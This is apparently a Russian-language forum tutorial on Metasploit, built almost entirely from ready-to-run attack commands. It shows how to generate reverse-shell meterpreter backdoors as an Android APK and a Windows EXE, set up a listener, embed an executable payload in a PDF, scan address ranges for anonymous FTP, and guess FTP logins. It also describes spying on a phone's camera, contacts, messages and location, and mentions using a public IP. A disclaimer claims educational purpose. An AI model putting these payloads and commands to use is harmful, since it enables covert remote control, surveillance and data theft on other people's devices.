Введение
Рад приветствовать дорогих читателей! Я практически уверен, что все, кто читает данную статью, как минимум слышали про такой замечательный фреймворк как Metasploit. Данный фреймворк хранит в себе довольно богатую базу данных различных уязвимостей на любой вкус и цвет, которые только возможно проэксплуатировать. В этой статье хочу познакомить вас с некоторыми полезными и даже можно выразиться базовыми уязвимостями, которые здорово помогут вам в изучении сферы информационной безопасности и естественно в саморазвитии.Дисклеймер: Все данные, предоставленные в данной статье, взяты из открытых источников, не призывают к действию и являются только лишь данными для ознакомления, и изучения механизмов используемых технологий.
Практическая часть
Итак, конечно же все действия будут проводиться на моей любимой Kali Linux, тем более там этот фреймворк уже предустановлен, поэтому если что, можно сразу к командам приступать и не париться.Бэкдор на андроид
Здесь мы будем генерировать полезную нагрузку на андроид устройствах, делается всё довольно просто.Мы вписываем вот такую команду для генерации:
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.9 lport= 4444 R> Test.apk
Что же означает данная команда? Давайте разберём!
- Часть строки, где написано android, указывает на операционную систему, под которую генерируется полезная нагрузка;
- meterpreter/reverse_tcp означает то, что подключаться к хосту данный бэкдор будет по протоколу tcp;
- lhost = 192.168.0.9 означает IP хоста, к которому будет подключаться бэкдор. Так как в рамках тестирования и ознакомления всё будет проходить в локальной сети, я ввёл свой локальный IP адрес. Для того, чтобы можно было подключиться из глобальной сети к вам, соответственно, нужен будет глобальный ваш IP адрес и при реверс инжиниринге бэкдора, его будет довольно легко выявить;
- lport = 4444 это собственно порт, по которому бэкдор будет обращаться к нам;
- И как не сложно догадаться, в строчке R > Test.apk задаётся название нашей полезной нагрузке.
После того как мы его запустили, нам нужно выбрать нашу полезную нагрузку, а для этого вписываем последовательно следующие команды:
use exploit/multi/handler
в данной команде мы выбираем эксплоит удалённого доступа
set payload android/meterpreter/reverse_tcp
здесь мы выбираем платформу и способ подключения
set lhost 192.168.0.9
задаём наш хост
set lport 4444
задаём порт
exploit
ну и собственно запускаем
Ну теперь я устанавливаю и открываю файл полезной нагрузки, и на экране моментально получаю сессию к моему устройству. Спектр возможностей удалённого доступа здесь весьма обширный. Можно сделать фотку через любую из камер телефона, лазить по директориям и скачивать какие-либо файлы, делать полный дамп номеров в телефонной книге, сообщений и звонков, узнать местоположение и многое многое другое.
Бэкдор на Windows.
Ну здесь всё происходит впринципе аналогичным образом, нужно будет поменять лишь несколько строчек.msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.9 lport= 4444 R> Test2.exe
Команда так же весьма проста и понятна, поэтому переходим сразу к нашему фреймворку. Запускаем его msfconsole.
Ну и далее так же по очереди запускаем следующие команды
Код:
use exploit/mulit/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.9
set lport 4444
exploit
Далее аналогичным образом проверяем всё это дело на Windows по средством запуска и сессия готова.
Эксплоит в PDF
Так же для фреймворка не составит труда сгенерировать PDF файл с полезной нагрузкой и аналогичным образом подключиться к нему. Давайте же приступим!Здесь уже msfvenom нам не понадобиться, будем всё делать прямиком в метасплоите, поэтому снова его запускаем msfconsole.
Далее прописываем вот такие команды:
Код:
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
Здесь будет задействован эксполит, который будет встроен в PDF файл
Код:
set lhost 192.168.0.9
set lport 4444
set filename Test3.pdf
Здесь задаём имя нашему файлу
Код:
exploit
Ну и далее генерируется полезная нагрузка в виде файла PDF. Подключиться можно будет так же через multi/handler. То есть просто не выходя из консоли прописываем:
Код:
use exploit/multi/handler
set lhost 192.168.0.9
set lport 4444
exploit
Ну и ждём сессии.
Вход по ftp
Так же наш фреймворк может спокойно просканировать диапазон IP адресов на возможность подключения к какому-либо с помощью ftp через логин AnonymousДля этого мы запускаем наш фреймворк msfconsole.
И вводим следующие команды:
Код:
use auxiliary/scanner/ftp/anonymous
Код:
set RHOSTS 192.168.1.200-254
Код:
set THREADS 55
run
Ну и собственно далее на экране у нас будут адреса на которых есть ftp и к которым можно подключиться через логин Anonymous без пароля и легко получить доступ.
Таким же образом можно и подбирать логин с паролем к диапазону адресов, для этого вводим следующие команды:
Код:
set RHOSTS 192.168.69.50-254
set THREADS 205
set USERNAME msfadmin
set PASSWORD msfadmin
set VERBOSE false
run
Ну и далее мы увидим адреса на которых есть ftp и к которым можно подключиться используя заданные вами логин и пароль для подбора.
Заключение
Сегодня поведал вам немного о такой волшебной и удивительной штуке как Metasploit Framework. И у него весьма широкий спектр применений, через него можно выполнять практически все ключевые задачи в тестировании чего-либо на уязвимость, но опять же повторюсь, что данная статья не побуждает к злонамеренным действиям и несёт лишь ознакомительный характер.
Последнее редактирование: